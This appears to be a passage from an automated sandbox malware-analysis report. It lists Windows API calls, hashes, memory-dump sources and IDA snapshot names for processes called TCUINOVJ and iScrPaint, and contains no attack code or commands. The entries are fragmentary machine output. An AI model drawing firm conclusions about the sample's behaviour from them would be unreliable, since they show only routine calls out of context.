                                                                                                                                                                                                                                                • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                                                                                                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                                                                                                                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538916108-0
                                                                                                                                                                                                                                                • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                                                                                                                                                                • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
• String ID:
• API String ID: 1900162674-0
APIs
• memset.MSVCRT ref: 0040749F
• SHBrowseForFolderW.SHELL32(?), ref: 004074B8
• SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
• SHGetMalloc.SHELL32(00000000), ref: 004074FE
  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: BrowseFocusFolderFromItemListMallocPathmemset
• String ID:
• API String ID: 1557639607-0
APIs
• ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
• ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@$EnvironmentExpandStrings$??2@
• String ID:
• API String ID: 612612615-0
APIs
  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
• SetWindowTextW.USER32(?,?), ref: 00403B12
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@TextWindow$Length
• String ID:
• API String ID: 2308334395-0
APIs
• GetObjectW.GDI32(?,0000005C,?), ref: 00407045
• CreateFontIndirectW.GDI32(?), ref: 0040705B
• GetDlgItem.USER32(?,000004B5), ref: 0040706F
• SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: CreateFontIndirectItemMessageObjectSend
• String ID:
• API String ID: 2001801573-0
APIs
• GetParent.USER32(?), ref: 00401BA8
• GetWindowRect.USER32(?,?), ref: 00401BC1
• ScreenToClient.USER32(00000000,?), ref: 00401BCF
• ScreenToClient.USER32(00000000,?), ref: 00401BD6
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2099118873-0
                                                                                                                                                                                                                                                • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                                                                                                                                                                • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _wtol
                                                                                                                                                                                                                                                • String ID: GUIFlags$[G@
                                                                                                                                                                                                                                                • API String ID: 2131799477-2126219683
                                                                                                                                                                                                                                                • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                                                                                                                                                                • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                • String ID: ?O@
                                                                                                                                                                                                                                                • API String ID: 1431749950-3511380453
                                                                                                                                                                                                                                                • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                                                                                                                                                                • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

Execution Graph

Execution Coverage: 0.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.4%
Total number of Nodes: 175
Total number of Limit Nodes: 0

Control-flow Graph

APIs
• IsDebuggerPresent.KERNEL32 ref: 6C07692C
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C076941
• UnhandledExceptionFilter.KERNEL32(6C2408B4), ref: 6C07694C
• GetCurrentProcess.KERNEL32(C0000409), ref: 6C076968
• TerminateProcess.KERNEL32(00000000), ref: 6C07696F
Memory Dump Source
• Source File: 00000010.00000002.2312355475.000000006BBC1000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BBC0000, based on PE: true
• Associated: 00000010.00000002.2312321940.000000006BBC0000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2340868298.000000006C2DD000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2340905408.000000006C2DF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2341070166.000000006C2EA000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2341114678.000000006C2EC000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2341439033.000000006C302000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2341628934.000000006C307000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000010.00000002.2341670339.000000006C30A000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_6bbc0000_iScrPaint.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
                                                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                                                • Opcode ID: 4494c9d4217b57442811599cb199e90558d53322e1ed481f9a752a247646e8b4
                                                                                                                                                                                                                                                • Instruction ID: e5e4b8e7d1497459ba40617549f6bbf590857048409e89d059fe3fe3b426c150
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4494c9d4217b57442811599cb199e90558d53322e1ed481f9a752a247646e8b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4421EDB6B053448BCF01DF69C58AA443BB8BB0B320F50545FE80AC7B80E7B85A81CF95

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • 2PostSignal(int,int,int,int), xrefs: 6BBC1579
                                                                                                                                                                                                                                                • 1SendSlot(int,int,int,int,int *), xrefs: 6BBC1556
                                                                                                                                                                                                                                                • 2SendSignal(int,int,int,int,int *), xrefs: 6BBC155C
                                                                                                                                                                                                                                                • 1PostSlot(int,int,int,int), xrefs: 6BBC1573
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2312355475.000000006BBC1000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BBC0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2312321940.000000006BBC0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340868298.000000006C2DD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340905408.000000006C2DF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341070166.000000006C2EA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341114678.000000006C2EC000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341439033.000000006C302000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341628934.000000006C307000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341670339.000000006C30A000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_6bbc0000_iScrPaint.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                                                • String ID: 1PostSlot(int,int,int,int)$1SendSlot(int,int,int,int,int *)$2PostSignal(int,int,int,int)$2SendSignal(int,int,int,int,int *)
                                                                                                                                                                                                                                                • API String ID: 431132790-2266928568
                                                                                                                                                                                                                                                • Opcode ID: c3608ae5938e43241bf96f6e6f2672b58efe1db8ffa26d910a8e58758bc56fd3
                                                                                                                                                                                                                                                • Instruction ID: c0066563d5a3ffe30731864b79e101b1d9187421e8f1ea9c867274c750b16068
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3608ae5938e43241bf96f6e6f2672b58efe1db8ffa26d910a8e58758bc56fd3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E21C6F2B00255AFDB14DFF88881BADB6B4EB05724F10852FE515FB6C1DB7889018B51

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • QStringCreate.WEBUI(?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC18F1
                                                                                                                                                                                                                                                • QStringSet.WEBUI(00000000,?,?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC18FD
                                                                                                                                                                                                                                                  • Part of subcall function 6BBC1338: __EH_prolog3.LIBCMT ref: 6BBC133F
                                                                                                                                                                                                                                                • QStringCreate.WEBUI(00000000,?,?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC1902
                                                                                                                                                                                                                                                • QStringSet.WEBUI(00000000,00000000,00000000,?,?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC190C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2312355475.000000006BBC1000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BBC0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2312321940.000000006BBC0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340868298.000000006C2DD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340905408.000000006C2DF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341070166.000000006C2EA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341114678.000000006C2EC000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341439033.000000006C302000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341628934.000000006C307000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341670339.000000006C30A000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_6bbc0000_iScrPaint.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Create$H_prolog3
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3317808019-0
                                                                                                                                                                                                                                                • Opcode ID: b26498ebdaec808e69169cc70a7ce7b30c571fb76c8d7e64d58460d9ac02194e
                                                                                                                                                                                                                                                • Instruction ID: 1cb1252e9ad78821f5fd182c1eb36ee3dc197de8fef448591e029e4d5a778e33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b26498ebdaec808e69169cc70a7ce7b30c571fb76c8d7e64d58460d9ac02194e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5E08C732002A07AD7019AB04C82F7F76ACEBE9A5EF18001AF64072140871C8C229277

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:22
                                                                                                                                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6B70692C
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6B706941
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(6B8D08B4), ref: 6B70694C
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 6B706968
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 6B70696F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2365800662.000000006B6A6000.00000020.00000001.01000000.00000014.sdmp, Offset: 6B250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365762036.000000006B250000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B251000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B293000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B2B2000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B2E9000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B30F000.00000020.00000001.01000000.00000014.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_6b250000_iScrPaint.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: edca91c8b1b166bbb65cd5f3d821f7b5d27d6a7a586edcc79482bdd182939356
• Instruction ID: c2fefe02435bb78dd5c68b17df432acacb780ee60e809a22bca201a87340cbc6
• Opcode Fuzzy Hash: edca91c8b1b166bbb65cd5f3d821f7b5d27d6a7a586edcc79482bdd182939356
• Instruction Fuzzy Hash: 522107B490A304EFCF85EF25D545A483BF4BB0A314F09547AE40987A54DBBCCA82CF59